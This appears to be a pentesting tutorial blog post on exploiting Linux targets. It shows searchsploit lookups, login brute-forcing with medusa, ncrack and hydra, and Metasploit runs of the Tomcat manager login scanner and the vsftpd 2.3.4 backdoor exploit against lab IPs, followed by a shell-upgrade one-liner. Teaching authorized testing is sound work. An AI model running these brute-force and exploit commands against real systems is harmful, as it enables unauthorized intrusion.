Approaches to Linux Exploitation
Introduction
In this blog post we will look for various approaches to exploit linux target and get remote access.
After identifying vulnerabilities, now we will exploit them to access target remotely
The basic approaches to exploit the target network:
-
What services are running in the target network?
-
What’s the version of running services?
-
Are they exploitable to any public CVE?
-
Any public exploit available to those services?
-
Had we found any potential vulnerability in our previous phases?
-
Any sensitive information we found?
-
Any credentials we found in previous phases?
-
Any web app vulnerability to get system-level access
-
Is the website also has admin panel/dashboard or any service are running, are exploitable?
There may be more approaches, depends on the skills of pentester and the pentesting scope and scenerios
Searchsploit
Searchsploit is used to find exploits of any exploitable network services, web services on the target network.
It Allows searching through exploits and shellcodes using one or more terms from Exploit-DB
Installing Searchsploit
# apt update && apt -y install exploitdb
After install, you can easily use it
searchsploit Linux kernel 3.2
Let’s use it to find exploit for linux kernel
$ searchsploit linux kernel 4. | head
---------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------- ---------------------------------
BSD/Linux Kernel 2.3 (BSD/OS 4.0 / FreeBSD 3. | bsd/dos/19423.c
HP-UX 11 / Linux Kernel 2.4 / Windows 2000/NT | multiple/dos/20997.c
Linux 4.18 - Arbitrary Kernel Read into dmesg | linux/dos/45405.txt
Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14. | linux_x86-64/local/42275.c
Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/ | linux_x86/local/42274.c
Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16 | linux_x86/local/42276.c
Linux Kernel (PonyOS 4.0) - 'fluttershy' LD_L | linux/local/41875.py
Suppose target is running Apache 5.3, let’s check available exploit for this service
$ searchsploit apache 5.3| head
---------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------- ---------------------------------
Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Rem | php/remote/29290.c
Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Rem | php/remote/29290.c
Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code | php/remote/29316.py
Apache ActiveMQ 5.2/5.3 - Source Code Informa | multiple/remote/33868.txt
Apache ActiveMQ 5.3 - 'admin/queueBrowse' Cro | multiple/remote/33905.txt
Apache Tomcat < 5.5.17 - Remote Directory Lis | multiple/remote/2061.txt
Apache Tomcat < 6.0.18 - 'utf8' Directory Tra | multiple/remote/6229.txt
To find the URL for the exploit, simply use -w.
$searchsploit -w apache 5.3| head
----------------------------------- --------------------------------------------
Exploit Title | URL
----------------------------------- --------------------------------------------
Apache + PHP < 5.3.12 / < 5.4.2 - | https://www.exploit-db.com/exploits/29290
Apache + PHP < 5.3.12 / < 5.4.2 - | https://www.exploit-db.com/exploits/29290
Apache + PHP < 5.3.12 / < 5.4.2 - | https://www.exploit-db.com/exploits/29316
Apache ActiveMQ 5.2/5.3 - Source C | https://www.exploit-db.com/exploits/33868
Apache ActiveMQ 5.3 - 'admin/queue | https://www.exploit-db.com/exploits/33905
Apache Tomcat < 5.5.17 - Remote Di | https://www.exploit-db.com/exploits/2061
Apache Tomcat < 6.0.18 - 'utf8' Di | https://www.exploit-db.com/exploits/14489
Like this you can easily find exploits to a particular vulnerability, and these exploits are also available with POC’s that helps you step by step to execute exploits against target
Exploiting Lower Hanging Fruits
Lower Hanging Fruits(LHF) exploitation is the process to leverage your previous phases’ findings to exploit the target system.
This approach is also save’s time and efforts of pentesters.
Lower hanging fruits, Means:
-
Misconfigured servers
-
Unimplemented or badly implemented ACL’s
-
Default or weak passwords (easily guessable)
-
Open SMB shares / Null sessions
-
Broadcast Requests
-
Vulnerabilities related to public exploits
-
Etc.
We have learned some of them previously if you remember, this is the right time to recall them.
Using Medusa to Exploit LHF
Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. The goal is to support as many services that allow remote authentication as possible.
Read medusa manual
$ man medusa
To see the usage of medusa
$ medusa -h
To list available modules of medusa
$ medusa -d
You can see there are many modules, but if you want to know about a specific module
$ medusa -M ftp -q
It will tell you all about ftp modules
To exploit target using medusa first we need to have wordlist which we can generate using cewl/cupp tools, or we can manually guess naming convention from target services, run web applications.
Basic usage of medusa
$ medusa -h <targetIp> -M ftp -U usernames.txt -P passwords.txt
Ncrack
Ncrack is designed for companies and security professionals to audit large networks for default or weak passwords rapidly and reliably. It can also be used to conduct fairly sophisticated and intensive brute force attacks against individual services.
Ncrack also has its wordlists available, to check:
$ ls -l /usr/share/ncrack/
total 904
-rw-r--r-- 1 root root 5754 Aug 28 2019 common.usr
-rw-r--r-- 1 root root 47070 Aug 28 2019 default.pwd
-rw-r--r-- 1 root root 3451 Aug 28 2019 default.usr
-rw-r--r-- 1 root root 22414 Aug 28 2019 jtr.pwd
-rw-r--r-- 1 root root 266 Aug 28 2019 minimal.usr
-rw-r--r-- 1 root root 356352 Aug 28 2019 myspace.pwd
-rw-r--r-- 1 root root 748 Aug 28 2019 ncrack-services
-rw-r--r-- 1 root root 58472 Aug 28 2019 phpbb.pwd
-rw-r--r-- 1 root root 410725 Aug 28 2019 top50000.pwd
ncrack -h
To specify a target
ncrack 10.10.10.180
ncrack me.hacker.com
Ncrack Supports FTP, Telnet, SSH, HTTP/HTTPS, POP3(S), SMB, RDP, VNC
USAGE:
ncrack <service_name>://target:<port_number>
Let’s target ssh
ncrack ssh 10.10.10.135
we can also specify the port
ncrack ssh://10.10.10.135:187 // Suppose ssh is running on port 187
Using hydra to exploit weak passwords
hydra is a very fast network logon cracker which supports many different services
usage :
$ hydra -h
-L - List of usernames -P - List of passwords
hydra -L users.txt -P passwords.txt ssh://10.10.10.135
**_To generate custom wordlists there are many tools available for this purpose like cewl(Available in Parrots OS), Mentalist, Rsmangler, etc.
Exploitation
The process of taking advantage of target vulnerabilities to get remote access in the target system and leverage access to perform malicious activities in the target system.
Having found vulnerabilities in the target system now proceed to exploit them.
Using Metasploit to exploit target vulnerability and get a meterpreter shell.
Using previous findings now we will exploit them in metasploit
Suppose you found that the target is running apache tomcat 5.5 server.
Search for exploit available on exploit-db
searchsploit -w apache tomcat 5.5
----------------------------------- --------------------------------------------
Exploit Title | URL
----------------------------------- --------------------------------------------
Apache Tomcat 5.5.0 < 5.5.29 / 6.0 | https://www.exploit-db.com/exploits/12343
Apache Tomcat 5.5.15 - cal2.jsp Cr | https://www.exploit-db.com/exploits/30563
Apache Tomcat 5.5.25 - Cross-Site | https://www.exploit-db.com/exploits/29435
Apache Tomcat < 5.5.17 - Remote Di | https://www.exploit-db.com/exploits/2061
Apache Tomcat < 6.0.18 - 'utf8' Di | https://www.exploit-db.com/exploits/14489
Apache Tomcat < 6.0.18 - 'utf8' Di | https://www.exploit-db.com/exploits/6229
Apache Tomcat < 9.0.1 (Beta) / < 8 | https://www.exploit-db.com/exploits/42953
Apache Tomcat < 9.0.1 (Beta) / < 8 | https://www.exploit-db.com/exploits/42966
You have two choices you can directly download exploit from exploit db and execute to gain target unauthorized access.
Or use metasploit to do this task for you.
First, start from password guessing as to its a low hanging fruit.
# msfconsole
# search tomcat_mgr_login
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/http/tomcat_mgr_login normal No Tomcat Application Manager Login Utility
msf5 > use auxiliary/scanner/http/tomcat_mgr_login
msf5 auxiliary(scanner/http/tomcat_mgr_login) >
Using the ‘show option’ command we can see the required options to set.
msf5 auxiliary(scanner/http/tomcat_mgr_login) > set rhost 10.10.10.150
rhost => 10.10.10.150
msf5 auxiliary(scanner/http/tomcat_mgr_login) > set rport 8180
rport => 8180
msf5 auxiliary(scanner/http/tomcat_mgr_login) > set rport 8080
rport => 8080
msf5 auxiliary(scanner/http/tomcat_mgr_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf5 auxiliary(scanner/http/tomcat_mgr_login) > set ssl true
[!] Changing the SSL option's value may require changing RPORT!
ssl => true
msf5 auxiliary(scanner/http/tomcat_mgr_login) > run
This will run and give us the desired result.
After getting credentials you can log in apache tomcat manager and will be able to perform malicious actions.
We can also use previous techniques.
Exploit FTP v2.3.4 server using metasplolit
> search vsftpd
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
Use exploit
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 21 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic
Set options
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOST 10.10.10.158
RHOST => 10.10.10.158
Port is already set to 21.
Simple use run/exploit command
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
And it will execute and if successful gives you meterpreter shell
In condition to get proper target shell use ‘shell’ command in meterpreter.
And suppose if you don’t have proper tty shell you can use python one-liner to get TTY shell
python -c 'import pty; pty.spawn("/bin/sh")'
Conclusion
In this blog post we have learned some basic approaches to exploit target, you can use some of these approaches in windows target also, like lower hanging fruit.